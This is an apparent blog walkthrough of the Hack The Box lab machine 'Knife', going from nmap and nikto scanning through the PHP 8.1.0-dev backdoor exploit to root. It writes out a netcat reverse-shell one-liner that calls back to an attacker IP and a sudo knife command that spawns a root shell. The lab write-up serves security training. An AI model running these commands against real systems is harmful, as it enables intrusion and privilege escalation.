Knife HacktheBox Walkthrough

7 months ago 89

Today we are going to solve the lab name as Knife –Hack the Box. The purpose is to accept the challenge to root the machine. Usage of sudo rights and remote code execution to pwn the victim’s machine.

Level: Easy

Table of Content

Network Scanning

Nmap

Enumeration

Nikto

Exploitation

RCE (Python) user.txt

Privilege Escalation

Sudo Rights root.txt

Kali: Attacker Machine

Victim’s Machine: HTB

Network Scanning

Run the Nmap to know the open ports and services.

nmap –A 10.129.223.91

As per the Nmap result, two ports are opened i.e. port 80 -HTTP and port 22 –SSH.

So now our only avenue of attack is through port 80 and port 22.

In the first look, we navigate port 80 in the web browser. But nothing informative we achieve here.

http://10.129.223.91

Enumeration

Without losing hope we move forward with the web scanner tool name as “Nikto” to get the vulnerability if any.Run the below command and output reveals the retrieved x-powered by the header as PHP/8.1.0-dev

nikto –h 10.129.223.91

Let’s Google the PHP8.1 exploit.

Above we find that PHP version 8.1 is vulnerable and allow us to do remote code execution. If this version runs on a server, an attacker can execute arbitrary code by sending the User-Agent header.

On exploit db, we get the exploit EBD –ID 49933 download the script from the below link and save it.

URL: https://www.exploit-db.com/exploits/49933

Exploitation

Execute the downloaded script on the kali and enter the full host URL of the victim’s machine (HTB machine). Simultaneously, run the netcat listener on port 1234 the next terminal.

nc –lvp 2334 python3 49933.py http://10.129.223.91

In the above screenshot, we are getting the garbage issue in the shell. Let’s take a reliable shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.100 1234 >/tmp/f

Wow!! On the netcat terminal, we have a session, and now the journey of enumeration starts and gets the user.txt.

But our hunger is for root.txt.Let’s proceed to the root flag.

I notice something interesting with sudo rights.

sudo -l

Privilege Escalation

As shown in the above screenshot, user James may run with /usr/bin/knife as a root because he has the sudo privileges with no password.

Let’s see what gtfobins said about the knife:

Knife: This is capable of running ruby code. If the binary is allowed to run as a superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

Refer: https://gtfobins.github.io/gtfobins/knife/#sudo

Below is the command to run

sudo /usr/bin/knife exec -E 'exec "/bin/sh"' cd /root ls cat root.txt

Finally, We capture the flag.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Read Entire Article